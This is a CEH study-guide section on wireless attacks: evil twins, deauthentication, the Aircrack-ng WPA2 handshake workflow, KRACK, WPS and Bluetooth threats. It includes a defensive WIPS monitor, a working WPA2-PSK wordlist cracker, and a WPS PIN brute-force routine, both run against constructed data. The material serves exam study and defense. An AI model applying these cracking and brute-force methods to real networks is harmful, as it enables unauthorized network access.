7.3 Wireless Threats and Attack Concepts

Key Takeaways

  • A rogue access point is any unauthorized AP attached to the network; an evil twin is a rogue AP that impersonates a trusted SSID (often with a stronger signal) to lure clients
  • Deauthentication frames are unauthenticated management frames on networks without Protected Management Frames (802.11w; optional in WPA2, mandatory in WPA3), enabling denial of service and forced reconnections that let an attacker capture the WPA2 4-way handshake
  • The Aircrack-ng suite drives the WPA2 capture workflow: airmon-ng enables monitor mode, airodump-ng captures frames, aireplay-ng injects deauth, and aircrack-ng runs the offline dictionary attack
  • The WPS PIN attack exploits an 8-digit PIN validated in two halves (the first 4 digits, then the next 3, with the 8th digit a checksum), reducing the search space from 10^8 to at most ~11,000 attempts; Pixie-Dust recovers the PIN offline in seconds on chipsets with predictable registrar nonces
  • Bluetooth faces bluejacking (unsolicited messages) and bluesnarfing (unauthorized data theft); defenders use non-discoverable mode, strong pairing, and disabling unused radios
Last updated: June 2026

How Wireless Attacks Are Categorized

For the CEH exam, group wireless threats by the security property they break. This framing beats memorizing tool names alone. The content below is conceptual and defensive — it explains what each attack does, the tool that performs it, and how a defender detects it, on networks you are authorized to test.

Rogue Access Point

A rogue AP is any wireless access point connected to the network without authorization — for example, an employee plugging in a personal AP for convenience. It creates an uncontrolled entry point that bypasses perimeter controls. Detection: a wireless intrusion prevention system (WIPS) compares observed BSSIDs against an authorized inventory; wired-side switch-port and MAC monitoring locates the device.

Evil Twin

An evil twin is a specialized rogue AP that copies a trusted SSID (and often a similar BSSID and stronger signal) so clients or auto-connect profiles join it instead of the real network. It enables on-path interception and credential capture via fake captive portals or a spoofed RADIUS endpoint. Detection: WIPS flags a duplicate SSID with an unexpected BSSID, a signal-strength anomaly, or an AP appearing where none is authorized.

Deauthentication and Disassociation

In networks without Protected Management Frames (802.11w, optional in WPA2 and mandatory in WPA3), management frames carry no integrity protection, so anyone in range can forge them with a spoofed source address. Forged deauthentication/disassociation frames knock clients off the AP, causing denial of service and forcing reconnections, which an attacker uses to capture a fresh 4-way handshake. Detection: an abnormal burst of deauth frames (commonly reason code 7, "class 3 frame received from nonassociated STA", the aireplay-ng default) or repeated client disconnects in WIPS logs.

RF Jamming

Jamming floods a frequency band with RF energy or noise so legitimate frames cannot be decoded. It is a pure availability attack at the physical layer. Detection: a spectrum analyzer or WIPS shows a sustained noise-floor rise and elevated retransmissions — packet capture alone reveals nothing because no valid frames exist.
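The detection logic described for rogue APs, evil twins and deauthentication floods above can be made concrete as a small WIPS-style monitor. The following is an added example written for this page, not code from any WIPS product or from the Aircrack-ng project. It builds a handful of constructed 802.11 management frames (beacons and deauthentication frames, assembled here rather than taken from a real capture), parses them back, compares beacon SSID/BSSID pairs against an assumed authorized inventory, and raises an alert when deauth frames carrying one BSSID exceed a threshold inside a sliding time window. The inventory, MAC addresses and thresholds are illustrative assumptions.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


# Constructed frames (built here, not taken from a real capture).
# 802.11 MAC header: frame control(2) duration(2) addr1(6) addr2(6) addr3(6) seq-ctl(2).
def build_beacon(bssid, ssid, seq=0):
    # frame control 0x0080 little-endian: type 0 (management), subtype 8 (beacon)
    hdr = struct.pack("<HH6s6s6sH", 0x0080, 0, mac_bytes(BROADCAST),
                      mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    body = struct.pack("<QHH", 0, 100, 0x0411)           # timestamp, beacon interval, capability
    body += bytes([0, len(ssid)]) + ssid.encode()         # information element 0 = SSID
    return hdr + body


def build_deauth(bssid, dst, reason=7, seq=0):
    # frame control 0x00c0: type 0, subtype 12 (deauthentication); body = reason code
    hdr = struct.pack("<HH6s6s6sH", 0x00C0, 0, mac_bytes(dst),
                      mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    return hdr + struct.pack("<H", reason)


def parse_frame(raw):
    fc, _dur, a1, a2, a3, _seq = struct.unpack_from("<HH6s6s6sH", raw, 0)
    if (fc >> 2) & 0x3 != 0:
        return None                                       # not a management frame
    subtype = (fc >> 4) & 0xF
    frame = {"dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3)}
    if subtype == 8:
        frame["subtype"] = "beacon"
        pos = 24 + 12                                     # skip the fixed beacon fields
        while pos + 2 <= len(raw):                        # walk the information elements
            tag, length = raw[pos], raw[pos + 1]
            if tag == 0:
                frame["ssid"] = raw[pos + 2:pos + 2 + length].decode(errors="replace")
                break
            pos += 2 + length
    elif subtype == 12:
        frame["subtype"] = "deauth"
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    else:
        frame["subtype"] = "other"
    return frame


class MiniWIPS:
    """Inventory comparison for beacons plus a sliding-window deauth counter per BSSID."""

    def __init__(self, inventory, deauth_threshold=10, window_s=5.0):
        self.inventory = inventory                        # ssid -> set of authorized BSSIDs (assumed)
        self.authorized = {b for bssids in inventory.values() for b in bssids}
        self.threshold = deauth_threshold
        self.window = window_s
        self.deauth_times = defaultdict(deque)
        self.reported = set()                             # suppress duplicate alerts

    def process(self, ts, raw):
        alerts = []
        f = parse_frame(raw)
        if f is None:
            return alerts
        if f["subtype"] == "beacon":
            key = ("beacon", f.get("ssid"), f["bssid"])
            if f["bssid"] in self.authorized or key in self.reported:
                return alerts
            self.reported.add(key)
            if f.get("ssid") in self.inventory:           # trusted SSID, untrusted BSSID
                alerts.append(f"EVIL TWIN: SSID {f['ssid']!r} advertised by unauthorized BSSID {f['bssid']}")
            else:                                         # SSID not in the inventory at all
                alerts.append(f"ROGUE AP: unknown SSID {f.get('ssid')!r} from BSSID {f['bssid']}")
        elif f["subtype"] == "deauth":
            q = self.deauth_times[f["bssid"]]
            q.append(ts)
            while q and ts - q[0] > self.window:          # drop timestamps outside the window
                q.popleft()
            key = ("deauth", f["bssid"])
            if len(q) >= self.threshold and key not in self.reported:
                self.reported.add(key)
                alerts.append(f"DEAUTH FLOOD: {len(q)} deauth frames carrying BSSID {f['bssid']} "
                              f"within {self.window:g}s (reason {f['reason']})")
        return alerts


def run_demo():
    """Feed a constructed frame sequence through the monitor and return the alerts."""
    inventory = {"CorpWiFi": {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"}}   # assumed inventory
    wips = MiniWIPS(inventory, deauth_threshold=10, window_s=5.0)
    frames = [(0.0, build_beacon("aa:bb:cc:dd:ee:01", "CorpWiFi")),     # legitimate AP
              (0.1, build_beacon("de:ad:be:ef:00:01", "CorpWiFi")),     # evil twin
              (0.2, build_beacon("02:11:22:33:44:55", "FreeWiFi")),     # rogue AP
              (0.3, build_beacon("de:ad:be:ef:00:01", "CorpWiFi"))]     # repeat, suppressed
    # 25 spoofed broadcast deauths "from" the real AP, 50 ms apart
    frames += [(1.0 + i * 0.05, build_deauth("aa:bb:cc:dd:ee:01", BROADCAST, seq=i)) for i in range(25)]
    alerts = []
    for ts, raw in frames:
        alerts.extend(wips.process(ts, raw))
    return alerts


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

A real deployment would read frames from a monitor-mode interface or a Kismet/airodump-ng PCAP instead of building them, but the two checks are the same ones a WIPS performs: beacon (SSID, BSSID) against inventory, and deauth rate per BSSID against a baseline.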

The WPA2 Handshake Capture Workflow (Aircrack-ng)

The canonical WPA2-PSK attack chains the Aircrack-ng suite. CEH expects you to map each tool to its role:

Step                     | Tool        | Role
1. Enable monitor mode   | airmon-ng   | Puts the adapter into monitor mode so it captures all 802.11 frames in range, not just its own
2. Discover targets      | airodump-ng | Scans channels and lists APs (BSSID, channel, encryption) and associated clients
3. Capture on one channel| airodump-ng | Locks to the target's channel/BSSID and writes frames (including any handshake) to a .cap file
4. Force a handshake     | aireplay-ng | Injects deauthentication frames (-0) at a connected client; on reconnect it performs the 4-way handshake, which airodump-ng captures
5. Crack offline         | aircrack-ng | Runs a dictionary/wordlist (e.g., rockyou.txt) against the captured handshake to recover the passphrase
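Step 5 is the one worth understanding in detail, because it explains why the attack works offline and why passphrase strength is the only thing that matters once a handshake is on disk. The following is an added example written for this page, not Aircrack-ng's own code. It implements the WPA2-PSK key schedule from the standard (PBKDF2-SHA1 for the PMK, PRF-512 for the PTK, HMAC-SHA1-128 for the EAPOL-Key MIC), builds a constructed message 2 of a 4-way handshake from an assumed passphrase so there is something to attack, and then runs a wordlist against it exactly as aircrack-ng does: derive the PMK and KCK per candidate and compare the recomputed MIC with the captured one. The SSID, MAC addresses, nonces and passphrase are all constructed here; nothing is read from a real capture.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11 PRF-512 over min/max of the two MACs and the two nonces; returns the 64-byte PTK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]                                     # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


MIC_OFFSET = 81   # EAPOL header (4 bytes) + key descriptor fields before the MIC (77 bytes)


def eapol_mic(kck, eapol):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the EAPOL frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce, mic, key_data):
    """EAPOL-Key message 2 of 4 (client -> AP): carries SNonce, the RSN IE and the MIC."""
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1)        # descriptor type RSN, key info (v2|pairwise|MIC), key len, replay ctr
    body += snonce + bytes(16) + bytes(8) + bytes(8)    # key nonce, key IV, key RSC, key ID
    body += mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type 3 (EAPOL-Key), length


def make_capture(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Constructed stand-in for what airodump-ng would have written: message 2 with a valid MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP/PSK RSN IE
    unsigned = build_msg2(snonce, bytes(16), rsn_ie)
    eapol = build_msg2(snonce, eapol_mic(kck, unsigned), rsn_ie)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


def crack(capture, wordlist):
    """The offline step: derive PMK and KCK for each candidate and check it against the captured MIC."""
    target = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:               # WPA-PSK passphrase length rule; skip impossible words
            continue
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), target):
            return candidate
    return None


# Constructed "capture": assumed network and passphrase, deterministic nonces.
CAPTURE = make_capture("Sunflower2019", "CorpWiFi",
                       bytes.fromhex("aabbccddee01"), bytes.fromhex("0011223344ff"),
                       hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest())

if __name__ == "__main__":
    print(crack(CAPTURE, ["password", "letmein", "Sunflower2019", "Sunflower2020"]))
```

Two things the code makes visible: the cost per candidate is dominated by the 4096-iteration PBKDF2 (which is why Hashcat moves it to the GPU and why PMKID cracking reuses the same PMK computation), and the SSID is the PBKDF2 salt, so a table of PMKs precomputed for a common SSID works against every network with that name.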

Other wireless tools CEH references:

  • Wifite — an automation wrapper that orchestrates the whole Aircrack-ng/WPS/PMKID flow against multiple targets with one command; useful for fast, repeatable authorized audits.
  • Kismet — a passive 802.11 (and Bluetooth/RF) detector, sniffer, and wireless IDS. It never injects; it identifies networks, can decloak hidden SSIDs in use, logs to PCAP, and supports GPS mapping (wardriving). Because it is passive, it is also a defensive monitoring tool.
  • Hashcat / John the Ripper — general password crackers that can accelerate WPA2 handshake/PMKID cracking with GPUs.

Cryptographic and Protocol Attacks

KRACK (Key Reinstallation Attack)

KRACK (2017) is a protocol-level weakness in the WPA2 4-way handshake. By replaying handshake message 3, an attacker forces the client to reinstall an already-in-use key, which resets its nonce and replay counters; encrypting again with the same key and nonce lets the attacker decrypt or replay frames (and some clients of the time reinstalled an all-zero key, exposing everything). KRACK is a flaw in the handshake state machine, not in AES. Mitigation: vendor patches on clients and APs (a patched client refuses to reinstall a key it already holds). WPA3 does not remove the issue by itself: SAE replaces the PSK-based PMK derivation, but the 4-way handshake still follows it, so patched implementations remain the control.

WPS PIN Attack (Reaver / Pixie-Dust)

Wi-Fi Protected Setup (WPS) lets a client join by proving knowledge of an 8-digit PIN. The registrar validates the PIN in two halves: the first 4 digits are checked at message M4 and the next 3 at M6, and the 8th digit is a checksum computed from the other seven. That design collapses the brute-force space from 10^8 to 10^4 + 10^3, at most ~11,000 attempts. Reaver performs this online brute force; the Pixie-Dust attack (reaver -K in the reaver-wps-fork-t6x fork) exploits predictable registrar nonces (E-S1/E-S2) on some chipsets to recover the PIN offline in seconds. Once the PIN is known, the AP hands over the WPA passphrase inside the WPS exchange, regardless of its strength. Mitigation: disable WPS entirely; a lockout after failed attempts only slows the online attack and does nothing against Pixie-Dust.
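The arithmetic above follows from the PIN format, and it is easy to verify by simulating the split validation. The following is an added example written for this page, not code from Reaver or from any WPS implementation. It implements the published WPS checksum rule (weighted digit sum, weights 3,1,3,1,3,1,3 over the first seven digits), a constructed stand-in for an AP registrar that answers NACK at the M4 stage for a wrong first half and at the M6 stage for a wrong second half, and the two-phase brute force that this behaviour allows; the attempt counter shows the 10,000 + 1,000 bound. The simulated registrar and the target PINs are assumptions for the demonstration.

```python
def wps_checksum(first7):
    """Checksum digit for a 7-digit WPS PIN body: weights 3,1,3,1,3,1,3 from the left, then complement mod 10."""
    acc = 0
    for i, ch in enumerate(f"{first7:07d}"):
        acc += int(ch) * (3 if i % 2 == 0 else 1)
    return (10 - acc % 10) % 10


def is_valid_pin(pin):
    """True if pin is 8 digits whose last digit is the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def full_pin(first7):
    """Append the checksum to a 7-digit body given as a string."""
    return first7 + str(wps_checksum(int(first7)))


class SimulatedRegistrar:
    """Constructed stand-in for an AP's WPS registrar (not a real WPS implementation).

    Mirrors the protocol's leak: a wrong first half is rejected after M4, a wrong
    second half after M6, so each answer tells the attacker which half was wrong.
    """

    def __init__(self, pin):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, candidate):
        self.attempts += 1
        if candidate[:4] != self.pin[:4]:
            return "NACK_M4"
        if candidate[4:7] != self.pin[4:7]:
            return "NACK_M6"
        return "OK"


def brute_force(registrar):
    """Two-phase search: fix the first half (<= 10,000 tries), then the second (<= 999 more)."""
    for p1 in range(10000):
        probe = f"{p1:04d}000"                     # second half 000 is itself the first candidate
        answer = registrar.try_pin(full_pin(probe))
        if answer == "NACK_M4":
            continue                               # first half wrong, nothing learned about the rest
        if answer == "OK":
            return full_pin(probe)
        for p2 in range(1, 1000):                  # first half confirmed; 000 already tried
            body = f"{p1:04d}{p2:03d}"
            if registrar.try_pin(full_pin(body)) == "OK":
                return full_pin(body)
        return None
    return None


if __name__ == "__main__":
    target = SimulatedRegistrar("12345670")        # the well-known WPS test PIN
    print(brute_force(target), target.attempts)
    worst = SimulatedRegistrar("99999995")         # highest valid PIN: worst case for the search
    print(brute_force(worst), worst.attempts)
```

The worst case lands at 10,999 attempts (10,000 first-half probes plus 999 second-half candidates), which is the "at most ~11,000" figure; without the split and checksum leak the same registrar would need up to 10^7 valid PINs tried one by one.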

Bluetooth, RFID, and NFC Threats

Wireless is broader than Wi-Fi. CEH tests short-range radio threats and their named attacks.

Technology | Range                                                      | Representative threats                                                                                                                  | Defender focus
Bluetooth  | ~10 m (Class 2 BR/EDR); up to ~100 m with Class 1 or BLE long-range | Bluejacking (push unsolicited messages), bluesnarfing (steal contacts/data without consent), bluebugging (take control of the device), device discovery/tracking | Non-discoverable mode, Secure Connections pairing, disable when unused, patch stacks
RFID       | cm to several m                                            | Skimming/eavesdropping, tag cloning, replay                                                                                             | Shielding, mutual authentication, encrypted tags, minimal data on tag
NFC        | < ~4 cm                                                    | Eavesdropping, data corruption, relay attacks                                                                                           | Short range as a control, transaction confirmation, encryption, disable when unused

Bluejacking vs bluesnarfing is a classic exam trap: bluejacking is harmless unsolicited messaging (annoyance, no data access), whereas bluesnarfing is the theft of data (contacts, calendars, messages) from a vulnerable device. Bluebugging goes further, hijacking call/messaging functions. Tools like Bluetooth scanners (e.g., btscanner) and Kismet discover nearby Bluetooth devices.

[Diagram: Evil Twin Attack Concept]

Test Your Knowledge

  • In the Aircrack-ng WPA2 capture workflow, which tool injects deauthentication frames to force a connected client to reconnect so the 4-way handshake can be captured?
  • Why does the WPS PIN brute-force attack require at most roughly 11,000 attempts instead of 100 million?
  • A CEH question describes an attacker pushing unsolicited messages to nearby phones via Bluetooth without accessing any of their stored data. Which attack is this, and how does it differ from the related threat?
  • Which detection method is appropriate for an RF jamming attack but NOT for an evil twin?